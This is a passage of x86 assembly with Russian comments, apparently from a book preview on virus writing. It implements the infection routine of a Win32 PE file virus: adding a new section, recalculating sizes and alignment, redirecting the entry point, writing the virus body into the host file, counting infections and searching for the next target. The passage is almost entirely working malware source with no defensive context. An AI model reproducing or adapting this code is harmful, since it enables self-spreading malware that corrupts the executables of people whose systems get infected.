xor eax,eax

mov ax,[ebp+offset numObj]

mov ecx,40

xor edx,edx

mul ecx

add esi,eax

;Увеличим число объектов на 1

inc word ptr [ebp+offset numObj]

lea edi,[ebp+offset newobject]

xchg edi,esi

;Вычислим относительный виртуальный адрес (Relative Virtual Address

;или RVA) нового объекта

mov eax,[edi−5*8+8]

add eax,[edi−5*8+12]

mov ecx,dword ptr [ebp+offset objalign]

xor edx,edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset RVA],eax

;Вычислим физический размер нового объекта

mov ecx,dword ptr [ebp+offset filealign]

mov eax,vend−vstart

xor edx,edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset physicalsize],eax

;Вычислим виртуальный размер нового объекта

mov ecx,dword ptr [ebp+offset objalign]

mov eax,vend–vstart+1000h

xor edx,edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset virtualsize],eax

;Вычислим физическое смещение нового объекта

mov eax,[edi−5*8+20]

add eax,[edi−5*8+16]

mov ecx,dword ptr [ebp+offset filealign]

xor edx,edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset physicaloffset],eax

;Обновим размер образа (размер в памяти) файла

mov eax,vend−vstart+1000h

add eax,dword ptr [ebp+offset imagesize]

mov ecx,[ebp+offset objalign]

xor edx,edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset imagesize],eax

;Скопируем новый объект в таблицу объектов

mov ecx,10

rep movsd

;Вычислим точку входа RVA

mov eax,dword ptr [ebp+offset RVA]

mov ebx,dword ptr [ebp+offset entrypointRVA]

mov dword ptr [ebp+offset entrypointRVA],eax

sub eax,ebx

add eax,5

;Установим значение, необходимое для возврата в носитель

mov dword ptr [ebp+offset subme],eax

;Поставим указатель позиции чтения/записи на начало PE−заголовка

push 0

push 0

push dword ptr [ebp+offset peheaderoffset]

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Запишем PE−заголовок и таблицу объектов в файл

push 0

lea eax,[ebp+offset bytesread]

push eax

push dword ptr [ebp+offset headersize]

lea eax,[ebp+offset peheader]

push eax

push dword ptr [ebp+offset ahand]

call WriteFile

;Увеличим счетчик заражений

inc byte ptr [ebp+offset countinfect]

;Поставим указатель позиции чтения/записи

;по физическому смещению нового объекта

push 0

push 0

push dword ptr [ebp+offset physicaloffset]

push dword ptr [ebp+offset ahand]

call SetFilePointer

;Запишем тело вируса в новый объект

push 0

lea eax,[ebp+offset bytesread]

push eax

push vend−vstart

lea eax,[ebp+offset vstart]

push eax

push dword ptr [ebp+offset ahand]

call WriteFile

;Закроем файл

notape:

push dword ptr [ebp+offset ahand]

call CloseFile

;Переход к следующему файлу

findnextone:

;Проверим, сколько файлов заразили: если 3,

;то выходим, если меньше – ищем следующий

cmp byte ptr [ebp+offset countinfect],3

jz outty

;Ищем следующий файл

lea eax,[ebp+offset win32_data_thang]

push eax

push dword ptr [ebp+offset searchhandle]

call FindNext

;Если файл найден, переходим к заражению

or eax,eax

jnz gofile

;Сюда попадаем, если файл не найден

foundnothing:

Конец ознакомительного фрагмента.